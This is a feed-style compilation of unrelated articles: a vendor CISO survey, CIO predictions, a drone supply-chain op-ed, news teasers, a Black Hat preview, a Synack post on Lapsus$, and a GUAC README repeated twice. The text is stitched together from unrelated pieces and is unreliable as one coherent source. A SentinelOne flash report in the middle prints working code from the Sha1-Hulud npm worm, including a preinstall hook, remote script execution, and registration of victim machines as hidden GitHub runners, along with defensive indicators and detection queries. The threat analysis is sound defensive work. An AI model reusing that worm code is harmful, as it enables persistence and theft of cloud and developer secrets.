Panorays, a leading provider of third-party security risk management software, has released the 2026 edition of its annual CISO Survey for Third-Party Cyber Risk Management.
The survey highlights third-party cyber risk as one of the most critical challenges facing security leaders today, driven largely by a lack of visibility. While 60% of CISOs report an increase in third-party security incidents, only 15% say they have full visibility into those risks.
These gaps are compounded by limited resources and technology stacks that weren’t designed to manage dynamic supply-chain threats at scale.
Drawing on responses from 200 CISOs of US-based companies, the 2026 Panorays CISO Survey puts a spotlight on cybersecurity executives’ continuing challenges to shore up software supply chain security, as these efforts are further undermined by resource constraints and tech stacks that fall short. Despite growing adoption, standard Governance, Risk, and Compliance (GRC) platforms have largely failed security teams, leaving them without the ability or confidence needed to effectively address the rising tide of third-party threats.
Left to right: Panorays Co-founders Meir Antar (COO), Matan Or-El (CEO) and Demi Ben-Ari (Chief Strategy Officer)
“Our findings show that third-party security vulnerabilities aren’t going away – in fact, they’re becoming more prevalent due to a dangerous lack of visibility and the rampant adoption of unmanaged AI tools,” said Matan Or-El, founder and CEO of Panorays. “Meanwhile, it’s especially alarming that only 15% of CISOs say they have the ability to map out their entire supply chains.”
“The rise of AI has only made supply chains more complex, and the connected nature of these data-dependent systems is expanding the attack surface,” Or-El continued. “CISOs are increasingly seeing the value of AI-driven solutions to increase clarity around the evolving threat landscape.”
The new report found there’s a growing sense of urgency among CISOs due to the failure of traditional GRC platforms to manage third-party risk at scale. Almost two-thirds of organizations have invested in GRC tools, up from just 27% in the 2025 version of Panorays’ report, yet overall visibility has declined, resulting in growing dissatisfaction about the ineffectiveness of these systems.
Fortunately, there are signs that organizations can close the visibility gap as more CISOs explore the use of advanced, AI-driven tools to improve their security posture. Adoption of AI for third-party risk management has surged, up from 27% a year ago to 66% this year.
This shift has led to significant, but still alarmingly insufficient, growth in the ability of organizations to properly assess the third-party threat landscape.
The 2026 survey found that 15% of CISOs now say they have full visibility into their software supply chains, up from just 3% a year ago, but much work remains to be done. While the progress is encouraging, the overall picture remains bleak, as 85% of organizations still lack a complete view of their overall threat landscape.
The 2026 CISO Survey was conducted in October 2025 by the independent research company Global Surveyz on behalf of Panorays. It’s based on responses from 200 Chief Information Security Officers, all of whom are full-time employees tasked with overseeing third-party cybersecurity risk management within their organizations. The sample included CISOs from the finance, insurance, professional services, technology, healthcare and software development sectors.
Panorays is a global provider of third-party cybersecurity management software. Adopted by leading banking, insurance, financial services, and healthcare organizations, Panorays enables businesses to optimize their defenses for each unique third-party relationship. With personalized and adaptive third-party cyber risk management, Panorays helps businesses stay ahead of emerging threats and delivers actionable remediations with strategic advantages with over 1,000 customers worldwide. The company serves enterprise and mid-market customers primarily in North America, the UK and the EU, Headquartered in New York and Israel, with offices around the world, Panorays is funded by numerous international investors, including Aleph VC, Oak HC/FT, Greenfield Partners, BlueRed Partners (Singapore), StepStone Group, Moneta VC, Imperva Co-Founder Amichai Shulman and former CEO of Palo Alto Networks Lane Bess. For more information, users can visit panorays.com or contact at info@panorays.com.
PR
Dan Edelstein
InboundJunction
pr@inboundjunction.com
As 2026 begins, my recent conversations with Chief Information Officers across Southeast Asia provided me with a grounded view of how digital transformation is evolving. While their perspectives differ in nuance, they converge on several defining shifts: the maturation of artificial intelligence, the emergence of autonomous systems, a renewed focus on data governance, and a reconfiguration of work. These changes signal not only technological advancement but a rethinking of how Southeast Asia organizations intend to compete and create value in an increasingly automated economy.
For our CIOs, the year ahead represents a decisive moment as AI moves beyond pilots and hype cycles. Organizations are expected to judge AI by measurable business outcomes rather than conceptual promise. AI capabilities will become standard features embedded across applications and infrastructure, fundamental rather than differentiating. The real challenge is no longer acquiring AI technology but operationalizing it in ways that align with strategic priorities.
Among the most transformative developments is the rise of agentic AI – autonomous agents capable of performing tasks and interacting across systems. CIOs anticipate that organizations will soon manage not a single AI system but networks of agents, each with distinct logic and behaviour. This shift ushers in a new strategic focus, agentic AI orchestration. Organizations will need platforms that coordinate multiple agents, enforce governance, manage digital identity, and ensure trust across heterogeneous technology environments. As AI ecosystems grow more complex, the CIO’s role evolves from integrator to orchestrator who directs a diverse array of intelligent systems.
As AI becomes more central to operations, data governance emerges as a critical enabler. Technology leaders expect 2026 to expose the limits of weak data foundations. Data quality, lineage, access controls, and regulatory compliance determine whether AI initiatives deliver value. Organizations that have accumulated “data debt” will be unable to scale, while those that invest early will move with greater speed and confidence.
Automation in physical environments is also set to accelerate as CIOs expect robotics to expand across healthcare, emergency services, retail, and food and beverage sectors. Robotics will shift from specialised deployments to routine service delivery, supporting productivity goals, standardizing quality, and addressing persistent labour constraints.
Looking ahead, our region’s CIOs point to the early signals of quantum computing’s relevance. While still emerging, quantum technologies are expected to gain visibility through evolving products and research. In my view, for Southeast Asia organizations, the priority is not immediate adoption but proactive monitoring, particularly in cybersecurity and long-term data protection, without undertaking premature architectural shifts.
Shutterstock
Perhaps the most provocative prediction concerns the nature of work. As specialised AI agents take on increasingly complex task chains, one CIO anticipates the rise of “cognitive supply chains” in which work is executed largely autonomously. Traditional job roles may fragment into task-based models, pushing individuals to redefine their contributions. Workplace identity could shift from static roles to dynamic capabilities, a broader evolution in how people create value in an AI-native economy.
One CIOs spotlight the changing nature of software development where natural-language-driven “vibe coding” is expected to mature, enabling non-technical teams to extend digital capabilities more intuitively. This trend will not diminish the relevance of enterprise software as both approaches will coexist to support different organizational needs.
Collectively, these perspectives shared by Southeast Asia’s CIO community point to Southeast Asia preparing for a structurally different digital future, defined by embedded AI, scaled autonomous systems, and disciplined data practices. The opportunity is substantial, but so is the responsibility placed on technology leaders.
As 2026 continue to unfold, the defining question will not simply be who uses AI, but who governs it effectively, integrates it responsibly, and shapes its trajectory to strengthen long-term enterprise resilience. Enjoy reading these top predictions for 2026 by our region’s most influential CIOs who are also our CIO100 ASEAN & Hong Kong Award 2025 winners:
| Ee Kiam Keong Deputy Chief Executive (Policy & Development) concurrent Chief Information Officer InfoComm Technology Division Gambling Regulatory Authority Singapore Prediction 1 AI continue to lead its edge esp. Agentic AI would be getting more popular and used, and AI Governance in terms AI risks and ethnics would get more focused Prediction 2 Quantum Computing related products should start to evolve and more apparent. Prediction 3 Deployment of robotic applications would be widened esp. in medical, emergency response and casual activities such retail, and food and beverage etc. |
| Ng Yee Pern, Chief Technology Officer Far East Organization Prediction 4 AI deployments will start to mature, as enterprises confront the disconnect between the inflated promises of AI vendors and the actual value delivered. Prediction 5 Vibe coding will mature and grow in adoption, but enterprise software is not going away. There is plenty of room for both to co-exist. |
| Athikom Kanchanavibhu Executive Vice President, Digital & Technology Transformation & Chief Information Security Officer Mitr Phol Group Prediction 6 The Next Vendor Battleground: Agentic AI Orchestration By 2026, AI will no longer be a differentiator, it will be a default feature, embedded as standard equipment across modern digital products. As every vendor develops its own Agentic AI, enterprises will manage not one AI, but an orchestra of autonomous agents, each optimized for its own ecosystem. The new battleground will be Agentic AI Orchestration where platforms can coordinate, govern, and securely connect agentic AIs across vendors and domains. 2026 won’t be about smarter agents, but about who can conduct the symphony best-safely, at scale, and across boundaries. Prediction 7 Enterprise AI Grows Up: Data Governance Takes Center Stage 2026 will mark the transition from AI pilots to AI in production. While out-of-the-box AI will become common, true competitive advantage will come from applying AI to enterprise-specific data and context. Many organizations will face a sobering realization: AI is only as good as the data it is trusted with. As AI moves into core business processes, data governance, management, and security will become non-negotiable foundations. Data quality, access control, privacy, and compliance will determine whether AI scales or stalls. In essence, 2026 will be the year enterprises learn that governing data well is the quiet superpower behind successful AI. |
| Jackson Ng Chief Technology Officer and Head of Fintech Azimut Group Prediction 8 In 2026, organizations will see AI seeking power while humans search for purpose. Cognitive supply chains of specialized AI agents will execute work autonomously, forcing individuals to redefine identity at work, in service, and in society. Roles will disintegrate, giving way to a task-based, AI-native economy |
NicoElNino / Shutterstock
Rumors suggest Apple may delay the iPhone 18, breaking its usual release cycle and leaving 2026 without a new base model. Here’s what could come next.
The post Rumor: Apple Could Delay iPhone 18 in 2026 — But Not for Long appeared first on TechRepublic.
Rumors suggest Apple may delay the iPhone 18, breaking its usual release cycle and leaving 2026 without a new base model. Here’s what could come next.
The post Rumor: Apple Could Delay iPhone 18 in 2026 — But Not for Long appeared first on TechRepublic.
OPINION — One of the things I loved about LEGO as a child was the ability to mix and match an endless amount of parts to create unique builds. Children (and some adults) gather around a bin of parts to create something new. Imagine being asked: “Build 10 houses in 30 minutes.” Everyone would come up with unique designs using various parts. Now, imagine a constraint: “You may only use red, 2x4, 2x2, and 1x2 bricks, white windows and doors, and it all has to fit on a green 32x32 baseplate.” Quickly, the limited supply causes a frantic scramble.
This scenario mirrors the recent call by the Department of War to field 300,000 drones over two years. The conflict in Ukraine exposed the U.S.'s lack of preparedness to equip forces with Purpose Built Attritable Systems (PBAS) at the scale of its peer competitors. Further, manufacturers are restricted by the requirement for critical components to be NDAA / BlueUAS compliant and, as of December 22nd, even more restrictions which demand non-critical components be U.S.-manufactured. The defense industrial base is struggling to meet unprecedented demand.
While numerous startups and giants have stepped up, the U.S. supply chain cannot sustain the required pace. Existing suppliers’ manufacturing capabilities are quickly surpassed as companies scramble to design, build, and market the requested systems.
sUAS are fundamentally basic, consisting of a flight controller (FC), electronic speed controller (ESC), motors, propellers, camera, radio/video transmitters, receivers, and a frame. The main problem is the availability of parts and, more critically, sub-components needed to make them. Manufacturers are all reaching into the same scarce “bin,” forcing suppliers to seek materials with increased vigor.
Motors, for instance, require neodymium and copper. The majority of motor production occurs outside of the U.S., where technology is mature, labor costs are lower, and the supply chain exists. However, the sUAS industry accounts for less than 8% of neodymium consumption in the U.S. Returning to the LEGO analogy, if a child asks for more 1x1 red bricks to make houses, LEGO, which (in this scenario) makes over 90% of its money on other parts, has little incentive to retool for large-scale 1x1 brick production.
Similarly, most FC and ESC boards are produced in Taiwan. While this was permissible under the original NDAA and BlueUAS frameworks, the new requirement for U.S. production necessitates standing up domestic manufacturing, likely to ensure production continues in the event that trade with Taiwan is disrupted. However, standing up U.S. companies, sourcing materials, hiring labor, and developing technology all create significant costs that are passed to the consumer. Since PBAS systems must remain attritable (affordable enough to be lost in combat), a higher cost per unit will force warfighters to be more judicious.
What national security news are you missing today? Get full access to your own national security daily brief by upgrading to Subscriber+Member status.
Given the intense demand and additional domestic constraints, how can the U.S. remain competitive? There are a few ways.
Incentivize existing global manufacturers to stand up U.S.-based manufacturing. Companies with existing technology, design, manufacturing, and supply chains should be incentivized to establish domestic production of like products.
Encourage raw material companies to invest upstream. Critical material mining companies (e.g., for lithium and neodymium) currently lack incentive to ensure stable, consistent supply to manufacturers. Encouraging investment upstream offers supply chain guarantees for domestic manufacturing and additional revenue for investors.
Establish a “strategic reserve” of raw materials. The U.S. maintains strategic oil and gas reserves. For future conflicts, a strategic reserve of critical sUAS materials is vital given the global stranglehold countries like China have on the market to enable rapid manufacturing scale-up even if trade is disrupted.
Increase throughput of BlueUAS and NDAA compliant components from outside the U.S. Maintaining U.S. connectivity to the global sUAS marketplace is important. While the restrictions are righteous, isolating U.S. production strains the raw material supply chain, causes allies to follow suit, and increases the overall cost per unit, reducing attritability. The U.S. should use the BlueUAS framework, with increased throughput, to identify compliant vendors across a wide section of allies and trade partners.
Expedite current NDAA compliant components manufactured overseas through BlueUAS processes. As manufacturing shifts to the U.S., the U.S. could provide ‘provisional’ BlueUAS certifications with limited durations to cover companies during the transition.
Sign up for the Cyber Initiatives Group Sunday newsletter, delivering expert-level insights on the cyber and tech stories of the day – directly to your inbox. Sign up for the CIG newsletter today.
Without a temporary easement or an adequate transitional period, the U.S. drone market is likely to shift abruptly. Many companies cannot afford to stand up U.S. production, or the cost of compliance would render their price points untenable. This situation would likely result in defense giants acquiring the IP/technology from smaller companies at a steep discount, leveraging their supply networks, lobbying, and significant capital advantage to continue development and manufacturing under their umbrella, returning the U.S. defense ecosystem to its former exclusive state, prior to the recent tranche of reforms.
The U.S. is at a critical inflection point in its quest for American Drone Dominance. The foundation it establishes will define its final strength and resilience. Care must be taken to avoid supply chain degradation, continue providing affordable solutions for the warfighter, and remain flexible and responsive in future crises. Incentivizing domestic production without isolation will ensure the U.S. has all the pieces it needs to build successfully, brick by brick.
The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals.
Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.
Who's reading this? 500K+ dedicated national security professionals. Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.
Read more expert-driven national security insights, perspective and analysis in The Cipher Brief because national security is everyone’s business.
The worm exposed Trust Wallet’s Developer GitHub secrets, allowing attackers to publish a backdoor extension and steal funds from 2,520 wallets.
The post Shai-Hulud Supply Chain Attack Led to $8.5 Million Trust Wallet Heist appeared first on SecurityWeek.
From open source libraries to AI-powered coding assistants, speed-driven development is introducing new third-party risks that threat actors are increasingly exploiting.
The post From Open Source to OpenAI: The Evolution of Third-Party Risk appeared first on SecurityWeek.
Notepad++ found a vulnerability in the way the software updater authenticates update files.
The post Notepad++ Patches Updater Flaw After Reports of Traffic Hijacking appeared first on SecurityWeek.
Minnesota’s adult-use cannabis market is facing a logistical hurdle – a shortage of licensed transporters – that has left retailers with empty shelves.
The logistics crisis plaguing the Minnesota marijuana market launch is a post from: MJBizDaily: Financial, Legal & Cannabusiness news for cannabis entrepreneurs
Shai-Hulud Worm 2.0 is a major escalation of the NPM supply chain attack, now executing in the preinstall phase to harvest credentials across AWS, Azure, and GCP and establish persistence via GitHub Actions.
The following SentinelOne Flash Report was sent to all SentinelOne customers and partners on Tuesday, November 25, 2025. It includes an in-depth analysis of the new variant’s tactics, our real-time detection posture, and the critical, immediate actions required to secure your environment.
| Document Type: Wayfinder Flash Report | TLP: Green |
| Date of Publication: 25 November 2025 | Cyber Risk Rating: High |
| Date of Research: 24 November 2025 | Referenced Threat Activity: Supply chain attacks |
“Sha1-Hulud” is the name of an ongoing NPM supply chain attack which started as early as November 21, 2025 according to public information. The new attack is similar to the previous “Shai Hulud”, but includes additional features and is triggered by different compromised packages. The name of the new attack comes from the malware author’s description inside the GitHub repository with the exfiltrated data:
While the attacks share similarities, the new attack is slightly different from the previous one and it is not yet known if both attacks come from the same threat actor.
The current attacks have impacted several popular packages such as:
A comprehensive list of affected packages can be found here.
Unlike the previous attack, which used “postinstall” to trigger the malware execution, the “Sha1-Hulud” attack utilizes “preinstall” to execute the malware:
Login...
"scripts": {
"preinstall": "node setup_bun.js"
}
...
}
The malware downloads the legitimate “bun” tool to orchestrate the current attack:
async function downloadAndSetupBun() {
try {
let command;
if (process.platform === 'win32') {
// Windows: Use PowerShell script
command = 'powershell -c "irm bun.sh/install.ps1|iex"';
} else {
// Linux/macOS: Use curl + bash script
command = 'curl -fsSL https://bun.sh/install | bash';
}
…
const environmentScript = path.join(__dirname, 'bun_environment.js');
if (fs.existsSync(environmentScript)) {
runExecutable(bunExecutable, [environmentScript]);
} else {
process.exit(0);
}
The file “bun_environment.js” is an obfuscated JavaScript malware being added to the compromised packages in the “Sha1-Hulud” attack.
This script creates additional files such as “cloud.json”, “contents.json”, “environment.json”, and “truffleSecrets.json” for exfiltration and “discussion.yaml” for persistence.
The payload then registers the infected machine as a self-hosted runner named “SHA1HULUD”:
let _0x449178 = await this.octokit.request("POST /repos/{owner}/{repo}/actions/runners/registration-token", {
'owner': _0x349291,
'repo': _0x2b1a39
});
if (_0x449178.status == 0xc9) {
let _0x1489ec = _0x449178.data.token;
if (a0_0x5a88b3.platform() === 'linux') {
await Bun.$`mkdir -p $HOME/.dev-env/`;
await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();
} else {
if (a0_0x5a88b3.platform() === "win32") {
await Bun.$`powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"`.cwd(a0_0x5a88b3.homedir());
await Bun.$`powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"`.cwd(a0_0x5a88b3.homedir());
await Bun.$`./config.cmd --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir()).quiet();
Bun.spawn(["powershell", '-ExecutionPolicy', "Bypass", "-Command", "Start-Process -WindowStyle Hidden -FilePath \"./run.cmd\""], {
'cwd': a0_0x5a88b3.homedir()
}).unref();
} else {
if (a0_0x5a88b3.platform() === "darwin") {
await Bun.$`mkdir -p $HOME/.dev-env/`;
await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
await Bun.$`./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env');
Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();
}
}
}
For persistence, the malware adds a workflow called “.github/workflows/discussion.yaml” that contains an injection vulnerability, allowing the threat actor to write a specially crafted message in the repository discussions section. Subsequently, the message executes code on the infected host registered as a runner.
Unlike previous attacks that only targeted the software development environment, this attack also steals AWS, GCP, and Azure secrets that could allow the threat actor to move laterally across the cloud environment. Such information is saved to the “cloud.json” file:
The base64 in Fig. 3 translates to the following:
{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}
The creation of the file does not necessarily mean that the cloud secrets have been stolen as the config can be empty.
The threat actor is also using Trufflehog in this new attack to steal secrets related to the development environment such as GitHub and NPM secrets and tokens – a similar tactic seen in the previous “Shai-Hulud” attack.
While the exact motives of the attackers are currently unknown, successful infection is resulting not only in the theft of intellectual property and private code, but also cloud secrets that could allow a broader breach across a cloud environment. The persistence capabilities allow the threat actor to execute malicious code on the infected host, which is an asset within the development environment of the victim.
SentinelOne EPP behavioral AI engines continuously monitor for suspicious activities associated with supply chain attacks and worm propagation, including:
The SentinelOne Platform Detection Library includes rules to detect Shai-Hulud worm activity across multiple attack stages:
The Wayfinder Threat Hunting team is proactively hunting, leveraging threat intelligence associated with this emerging threat. If any suspicious activity is identified in your environment, we will notify your organization’s designated escalation contacts immediately.
Wayfinder Threat Hunting provides the following recommendations for immediate action and strategic mitigation:
| Type | Value | Description |
| SHA1 | 3d7570d14d34b0ba137d502f042b27b0f37a59fa | bun_environment.js |
| SHA1 | d60ec97eea19fffb4809bc35b91033b52490ca11 | bun_environment.js |
| SHA1 | 8de87cf4fbdd1b490991a1ceb9c1198013d268c2 | bun_environment.js |
| SHA1 | f37c6179739cf47e60280dd78cb1a86fd86a2dcf | bun_environment.js |
| SHA1 | 91429fbfef99fa52b6386d666e859707a07844b2 | bun_environment.js |
| SHA1 | ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc | bun_environment.js |
dataSource.name = 'SentinelOne' and event.type = 'Process Creation' and src.process.cmdline contains '--name SHA1HULUD' and src.process.cmdline contains '--unattended --token '
dataSource.name = 'SentinelOne' AND tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc") and src.process.name contains 'node'
dataSource.name = 'SentinelOne' AND tgt.file.size>7000000 AND (tgt.file.path contains '/bun_environment.js' or tgt.file.path contains '\\bun_environment.js') AND !(tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc"))
EXECUTIVE SUMMARY:
One of the leading cyber security conferences globally, Black Hat USA is where intellect meets innovation. The 2024 event is taking place from August 3rd – 8th, at the Mandalay Bay Convention Center in Las Vegas.
The conference is highly regarded for its emphasis on cutting-edge cyber security research, high-caliber presentations, skill development workshops, peer networking opportunities, and for its Business Hall, which showcases innovative cyber security solutions.
Although two other cyber security conferences in Las Vegas will compete for attention next week, Black Hat is widely considered the main draw. Last year, Black Hat USA hosted roughly 20,000 in-person attendees from 127 different countries.
The Black Hat audience typically includes a mix of cyber security researchers, ethical hackers, cyber security professionals – from system administrators to CISOs – business development professionals, and government security experts.
On the main stage this year, featured speakers include Ann Johnson, the Corporate Vice President and Deputy CISO of Microsoft, Jen Easterly, Director of the Cybersecurity and Infrastructure Security Agency (CISA), and Harry Coker Jr., National Cyber Director for the United States Executive Office of the President.
The Black Hat CISO Summit, on Monday, August 5th through Tuesday, August 6th, caters to the needs and interests of CISOs and security executives. This track will address topics ranging from the quantification of cyber risk costs, to supply chain security, to cyber crisis management.
Professionals who are certified through ISC2 can earn 5.5 Continuing Professional Education (CPE) credits for CISO Summit attendance.
If you’re attending the event, plan ahead to make the most of your time. There’s so much to see and do. Looking for a short-list of must-see speaking sessions? Here are a handful of expert-led and highly recommended talks:
Be ready for anything and bring the best version of yourself – you never know who you’ll meet. They could be your next software developer, corporate manager, business partner, MSSP, or cyber security vendor. Meet us at booth #2936. We can’t wait to see you at Black Hat USA 2024!
For more event information, click here. For additional cutting-edge cyber security insights, click here. Lastly, to receive cyber security thought leadership articles, groundbreaking research and emerging threat analyses each week, subscribe to the CyberTalk.org newsletter.
The post A preview of the upcoming Black Hat conference… appeared first on CyberTalk.
Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue
Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database—normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.
Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model:
A few examples of questions answered by GUAC include:
Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!
Here is an overview of the architecture of GUAC:
We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.
For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.
Information about governance can be found here.
Kim Crawley
NVIDIA. Samsung. Microsoft. Okta. Globant. At least one of these Lapsus$ targets could be in your company’s tech supply chain. Regardless, these high-profile attacks highlight how interconnected and dependent IT systems become as companies grow and innovate, and the need to secure your supply chain.
Lapsus$, a global cybercrime group, has a tendency to go deep into a major tech vendor’s networks, find sensitive data and leak it. The breached data so far has included authentication credentials and encryption keys.
In the case of Lapsus$, they used a smaller vendor as a means of compromising a bigger target, like Okta, which then created a domino effect of having access to hundreds or thousands more credentials of those companies that contract with the bigger company. We saw a similar strategy with SolarWinds, wherein SolarWinds was breached and a vulnerability was pushed to its customers within a software update, leading to additional breaches. The risk of a breach is on both entry and exit: which vendors might lead to a breach within your network and which of your customers might then be breached?
The City of London police arrested several individuals who are alleged to be members of Lapsus$. But Lapsus$ struck Globant after the arrests, which indicates there may be many members who are continuing to execute cyber attacks.
Lapsus$ isn’t the first cybercrime group to wreak havoc upon vendor supply chains, and they definitely won’t be the last. Unfortunately, security researchers know that the proliferation of critical vulnerabilities is growing rapidly, and so too are the number of cyber attackers exploiting them. According to the CVE database, 18,325 vulnerabilities were added in 2020, and 20,149 in 2021. More than 6,000 vulnerabilities have been added in the first quarter of 2022. If this year continues at that rate, we’ll end 2022 with over 24,000 new vulnerabilities.
Traditional, point-in-time pentesting can’t keep up with the pace. When you add the complexity of cloud networks and diverse supply chains to the mix, it’s inevitable to lose visibility into your network’s security.
Cloud networks have been a boon for business, allowing companies to scale IT systems quickly and efficiently. But this also means that companies can add publicly accessible cloud services at will, with little oversight from the security team. Then factor in all of your vendors that provide services and infrastructure beyond security. Their vulnerabilities are also your company’s vulnerabilities. When cybercrime groups like Lapsus$ attack them, they’re also attacking your business up the chain.
You need a solution that will empower your security team to quickly find vulnerabilities wherever they emerge in your supply chain and remediate them with ease.
Synack combines an automated scanner, SmartScan, with the human intelligence of more than 1,500 carefully vetted security researchers from the Synack Red Team to find critical vulnerabilities across your network and tech supply chain. That combination of automation and human intelligence is at the core of the Synack Platform’s ability to bring you a better way to pentest. Within the Synack Platform, you can also request on-demand checks for specific vulns, like the OWASP top 10, or new critical CVEs when they appear, such as log4j.
It’s the most efficient and thorough way to conduct on-demand pentests in today’s complex computer. A few point-in-time pentests per year conducted by just a few people, simply to meet compliance, doesn’t cut it anymore. With densely networked supply chains and rapidly multiplying cloud services, new vulnerabilities are implemented faster than ever before. Whether Lapsus$ strikes one of your vendors, or one of many cybercrime groups that will inevitably emerge, your organization will be ready to defend against the evolving cyber threat landscape.
The post The Lapsus$ Threat Reinforces Critical Need to Secure Your Supply Chain appeared first on Synack.
Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue
Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database—normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.
Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model:
A few examples of questions answered by GUAC include:
Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!
Here is an overview of the architecture of GUAC:
We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.
For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.
Information about governance can be found here.
